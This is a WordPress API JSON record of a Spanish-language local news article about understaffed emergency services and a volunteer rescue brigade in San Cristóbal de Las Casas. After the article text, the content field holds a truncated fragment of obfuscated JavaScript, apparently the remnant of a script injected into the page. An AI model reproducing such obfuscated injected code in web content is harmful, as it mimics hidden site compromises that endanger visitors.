{"id":13095,"date":"2023-12-07T09:56:06","date_gmt":"2023-12-07T09:56:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13095"},"modified":"2023-12-07T09:56:07","modified_gmt":"2023-12-07T09:56:07","slug":"insuficiente-personal-en-corporaciones-de-emergencia-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13095","title":{"rendered":"Insuficiente personal en corporaciones de emergencia en SCLC"},"content":{"rendered":"\n<div class=\"wp-block-cover\"><span aria-hidden=\"true\" class=\"wp-block-cover__background has-background-dim\"><\/span><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"810\" class=\"wp-block-cover__image-background wp-image-13097\" alt=\"\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701942923974.jpg\" data-object-fit=\"cover\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701942923974.jpg 1080w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701942923974-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701942923974-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/12\/FB_IMG_1701942923974-768x576.jpg 768w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-center has-large-font-size\"><\/p>\n<\/div><\/div>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional del Voluntario, integrantes de la Brigada de Rescatistas Voluntarios de esta ciudad, dieron a conocer que el personal y voluntarios en las diferentes corporaciones de emergencia son insuficientes y eso se ha visto cuando hay una emergencia mayor, como un incendio forestal o alguna inundaci\u00f3n.Al respecto, Rub\u00e9n Osorio Ferreira se\u00f1al\u00f3 que ellos est\u00e1n confirmados por unas 50 personas conocedoras de primeros auxilios y apoyo en diversos siniestros que ocurren incluso en la Regi\u00f3n de Los Altos, &#8220;ese d\u00eda es tradicional festejarlo para todos los que somos voluntarios, porque hay mucho personal calificado y profesional, pero son elementos pagados que est\u00e1n en estaciones de bomberos, Cruz Roja, Protecci\u00f3n Civil, y a alguna otra organizaci\u00f3n como M\u00e9dicos sin Fronteras&#8221;&#8221;Los que somos voluntarios no percibimos un solo peso, al contrario invertimos nuestro dinero, mucha gente deber\u00eda unirse a este tipo de voluntariados porque la ciudadan\u00eda siempre va requerir de alg\u00fan apoyo y si lo podemos llevar en las capacitaciones que da la brigada, vale la pena servirle a la ciudadan\u00eda de esta manera, hay varias formas de capacitaci\u00f3n, una de las m\u00e1s importantes es cuando nos invitan al extranjero o nos traen capacitadores de fuera, lo que aprendemos lo vamos transmitiendo a futuras generaciones&#8221;.Se\u00f1al\u00f3 que en su caso tiene 30 a\u00f1os de servirle a la comunidad &#8220;a mucho orgullo y seguimos en lo mismo, yo fui director operativo de la Estaci\u00f3n de Bomberos durante 3 a\u00f1os, de repente pareciera que no hacemos nada pero cuando sucede una desgracia un poco mayor, siempre somos insuficientes todas las corporaciones porque siempre nos rebasa, por ejemplo en los \u00faltimos incendios que hemos tenido fuertes hemos contado con el apoyo de las personas que venden agua, ellos nos han ayudado, ya es un paliativo pero a veces es insuficiente&#8221;.&#8221;Por eso es tan importante la labor de los voluntarios, son malas las comparaciones pero desafortunadamente no aprendemos como los extranjeros que por ley por cada 10 mil habitantes debe haber una estaci\u00f3n de bomberos. Nos hemos consolidado gracias a donativos de diferentes instancias e instituciones pero son cosas muy leves, se aceptan donativos en la Colonia Bur\u00f3cratas en Calle 5 de Mayo n\u00famero 17, donde se encuentra la subestaci\u00f3n de la Comisi\u00f3n Federal de Electricidad&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional del Voluntario, integrantes de la Brigada de Rescatistas Voluntarios de esta ciudad, dieron a conocer que el personal y voluntarios en las diferentes corporaciones de emergencia son insuficientes y eso se ha visto cuando hay una emergencia mayor, como un incendio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13097,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13095","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13095","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13095"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13095\/revisions"}],"predecessor-version":[{"id":13098,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13095\/revisions\/13098"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13097"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13095"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13095"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13095"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}